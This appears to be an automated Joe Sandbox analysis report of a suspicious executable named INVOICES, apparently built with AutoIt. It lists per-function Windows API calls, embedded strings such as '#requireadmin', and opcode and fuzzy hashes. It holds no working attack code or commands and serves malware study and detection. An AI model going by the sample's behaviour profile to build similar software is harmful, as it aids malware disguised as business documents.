                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                  • Opcode ID: 038c127a9f3a79c6caa19b2202ae2b55b608e2c3a4fd7e69f5baaf391e5926f0
                                                                                                                                  • Instruction ID: c204df2d09fe5d62c4020abf24421b7444b731d2466bf1efb105f3173b097e89
                                                                                                                                  • Opcode Fuzzy Hash: 038c127a9f3a79c6caa19b2202ae2b55b608e2c3a4fd7e69f5baaf391e5926f0
                                                                                                                                  • Instruction Fuzzy Hash: 0B217C72188221A6D234BA249C06FB77398AF52324F508039F885C6082EB9DAD52C392
                                                                                                                                  Function 007B75FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
                                                                                                                                    • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
                                                                                                                                    • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007B7664
                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007B7671
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007B767C
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007B768B
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007B7697
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                  • Opcode ID: 553b513a842faffb51e5d8b54f34451f7bf8cf268c29251b2d5ffe0c41824bdd
                                                                                                                                  • Instruction ID: f42e3d23452643b09a33e1317a6006a977d60aa126287f45a5ffe0bf21df0496
                                                                                                                                  • Opcode Fuzzy Hash: 553b513a842faffb51e5d8b54f34451f7bf8cf268c29251b2d5ffe0c41824bdd
                                                                                                                                  • Instruction Fuzzy Hash: 4C11B2B2110219BFEF159F64CC85EE77F6DEF08758F014115FB04A60A0C676AC21DBA4
                                                                                                                                  Function 00754109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00754123
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0075412A
                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00754136
                                                                                                                                  • RtlDecodePointer.NTDLL(00000001), ref: 00754153
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 3489934621-340411864
                                                                                                                                  • Opcode ID: 464ed159f4882a08de536f37e312c7c61ab8a3db033ee3f64651871147eac148
                                                                                                                                  • Instruction ID: 8c40cebdd9099b23ad7918917110c5c28204f9bdbff7f8db8f2aa0c2963122ba
                                                                                                                                  • Opcode Fuzzy Hash: 464ed159f4882a08de536f37e312c7c61ab8a3db033ee3f64651871147eac148
                                                                                                                                  • Instruction Fuzzy Hash: F6E0E570790B08AAEB105B74EC09F643BA4A716B07F10C528F812D61A0DABD4585CB08
                                                                                                                                  Function 007541DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007540F8), ref: 007541F8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 007541FF
                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 0075420A
                                                                                                                                  • RtlDecodePointer.NTDLL(007540F8), ref: 00754225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 3489934621-2819208100
                                                                                                                                  • Opcode ID: 42c4324116814780b7b494304f507d201a52935f42228a303ef751b82cd68d24
                                                                                                                                  • Instruction ID: 72c546d97e01dd126e88907c103db2496f303e37aa0d617a6030cbf32a7c2570
                                                                                                                                  • Opcode Fuzzy Hash: 42c4324116814780b7b494304f507d201a52935f42228a303ef751b82cd68d24
                                                                                                                                  • Instruction Fuzzy Hash: C8E0B6B0685709ABEB109F61EC0DF543BA4B714B46F10C628F511E21A4CBBF9684CB19
                                                                                                                                  Function 007A6C19 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 007A6D16
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A6D4A
                                                                                                                                  • htons.WS2_32(?), ref: 007A6E00
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 007A6DBD
                                                                                                                                    • Part of subcall function 0078ABF4: _strlen.LIBCMT ref: 0078ABFE
                                                                                                                                    • Part of subcall function 0078ABF4: _memmove.LIBCMT ref: 0078AC20
                                                                                                                                  • _strlen.LIBCMT ref: 007A6E5A
                                                                                                                                  • _memmove.LIBCMT ref: 007A6EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3619996494-0
                                                                                                                                  • Opcode ID: ec720cd60a8c3bc3496e6d01a7747385c7cae2c99428c211edb3548492d74d7e
                                                                                                                                  • Instruction ID: 5d720d77f2ffda109d4aeabaaf06e70eb52efc523a70dd664baa329896c9387e
                                                                                                                                  • Opcode Fuzzy Hash: ec720cd60a8c3bc3496e6d01a7747385c7cae2c99428c211edb3548492d74d7e
                                                                                                                                  • Instruction Fuzzy Hash: E681C175108300EBE710EF24CC89F6BB7A9EFC5714F188A18F5559B292DA78AD04C7A2
                                                                                                                                  Function 00796561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                  • Opcode ID: 17187a60794a1330ccb19245ca6489b0361c186fca4493ddc51a656a333291e2
                                                                                                                                  • Instruction ID: f2024fe4b3661044444b3fe81c80c7279dbef1b88d92eede48b47e26606d65ec
                                                                                                                                  • Opcode Fuzzy Hash: 17187a60794a1330ccb19245ca6489b0361c186fca4493ddc51a656a333291e2
                                                                                                                                  • Instruction Fuzzy Hash: E261EE7050025ADBDF11EF64DC8AEFE77A8AF44308F044A18FD595B292EB78AD15CB90
                                                                                                                                  Function 007B026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0348
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B0388
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007B03AB
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007B03D4
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007B0417
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B0424
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                  • Opcode ID: a172809407808af83c3a4992436efcfe898e31fa8744618a6c38bf0c8bd14b0f
                                                                                                                                  • Instruction ID: 8ad5727a2cf39a13ef7d9550fbba718bede24368c8feb752593387a8c7ffb79c
                                                                                                                                  • Opcode Fuzzy Hash: a172809407808af83c3a4992436efcfe898e31fa8744618a6c38bf0c8bd14b0f
                                                                                                                                  • Instruction Fuzzy Hash: 15513B71108240EFD714EF64C889EABBBE8FF89714F04891DF585871A2DB79E905CB92
                                                                                                                                  Function 007B5802 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(?), ref: 007B5864
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 007B589B
                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007B58C3
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 007B5932
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 007B5940
                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 007B5991
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                  • Opcode ID: eaad609140dfbb730a992a16d2fd80d562273d0c5f93854be68c1c0fec21b922
                                                                                                                                  • Instruction ID: 6c48a54fe3a7b2b2951fa0a7c5e6812a261ff4d6a44f29e07b636376d31fdc15
                                                                                                                                  • Opcode Fuzzy Hash: eaad609140dfbb730a992a16d2fd80d562273d0c5f93854be68c1c0fec21b922
                                                                                                                                  • Instruction Fuzzy Hash: A7515931A00615EFDF15EFA4C849BEEB7B4EF48720F148069E945BB251CB78AE418B94
                                                                                                                                  Function 0078F1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0078F218
                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 0078F28A
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0078F2E5
                                                                                                                                  • _memmove.LIBCMT ref: 0078F30F
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0078F35C
                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0078F38A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                  • Opcode ID: 7ed8216bdf440430c1aa743152b0f53d9a821a86ee91d9f049360274944ea7cc
                                                                                                                                  • Instruction ID: 8a3b4f7d0e22bcdcafb21bb2a68993d95310604d60e48c28929e66c28fc4a77d
                                                                                                                                  • Opcode Fuzzy Hash: 7ed8216bdf440430c1aa743152b0f53d9a821a86ee91d9f049360274944ea7cc
                                                                                                                                  • Instruction Fuzzy Hash: 9E5128B5A00209EFDB14DF58C884AAABBB8FF4C314B158569ED59DB301E734E951CFA0
                                                                                                                                  Function 00792502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00792550
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079259B
                                                                                                                                  • IsMenu.USER32(00000000), ref: 007925BB
                                                                                                                                  • CreatePopupMenu.USER32 ref: 007925EF
                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 0079264D
                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0079267E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                  • Opcode ID: f30c6ed5e61f70cd5ac72150c2c316225e48869d7ff4ba88abd86b86bca34a4d
                                                                                                                                  • Instruction ID: d5198e56eec5eb39be3f80fd2f649959529dfd0711fc7431939802574213e46e
                                                                                                                                  • Opcode Fuzzy Hash: f30c6ed5e61f70cd5ac72150c2c316225e48869d7ff4ba88abd86b86bca34a4d
                                                                                                                                  • Instruction Fuzzy Hash: 8651A070601345FFCF20EF68E888BADBBF4BF44314F244159E85197A92D7789906CB51
                                                                                                                                  Function 00731765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 0073179A
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007317FE
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0073181B
                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0073182C
                                                                                                                                  • EndPaint.USER32(?,?), ref: 00731876
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                  • Opcode ID: d37566ab20aa1909192c5d0c5173e6e2dd9cd586995b48c402f2ee9a2578e15a
                                                                                                                                  • Instruction ID: da72ce06492ab2eb3028353b314bc5d1a83fc1305c567be569ce1c2e3c544a12
                                                                                                                                  • Opcode Fuzzy Hash: d37566ab20aa1909192c5d0c5173e6e2dd9cd586995b48c402f2ee9a2578e15a
                                                                                                                                  • Instruction Fuzzy Hash: 8C41A030104704EFE710DF29CC88FB67BE8EB49774F044669FA95872A2C738A845DB65
                                                                                                                                  Function 007BB6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(007F57B0,00000000,010C49E0,?,?,007F57B0,?,007BB5DC,?,?), ref: 007BB746
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 007BB76A
                                                                                                                                  • ShowWindow.USER32(007F57B0,00000000,010C49E0,?,?,007F57B0,?,007BB5DC,?,?), ref: 007BB7CA
                                                                                                                                  • ShowWindow.USER32(00000000,00000004,?,007BB5DC,?,?), ref: 007BB7DC
                                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 007BB800
                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007BB823
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                  • Opcode ID: badac653824e6d201482395f2a81b5d9a33344b52c9f197c5316532de07f2f21
                                                                                                                                  • Instruction ID: f1dee1219734168ad410e97d9e78a1d07d3d82495f3bb3b3e45891d3b65d5099
                                                                                                                                  • Opcode Fuzzy Hash: badac653824e6d201482395f2a81b5d9a33344b52c9f197c5316532de07f2f21
                                                                                                                                  • Instruction Fuzzy Hash: 63414F34600144EFDB22CF25C889BD47BE5BB45714F5881BAED498F2A2CBB9A845CB91
                                                                                                                                  Function 007A71B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,007A4F57,?,?,00000000,00000001), ref: 007A71C1
                                                                                                                                    • Part of subcall function 007A3AB6: GetWindowRect.USER32(?,?), ref: 007A3AC9
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007A71EB
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007A71F2
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007A7224
                                                                                                                                    • Part of subcall function 007952EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007A7250
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007A72AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
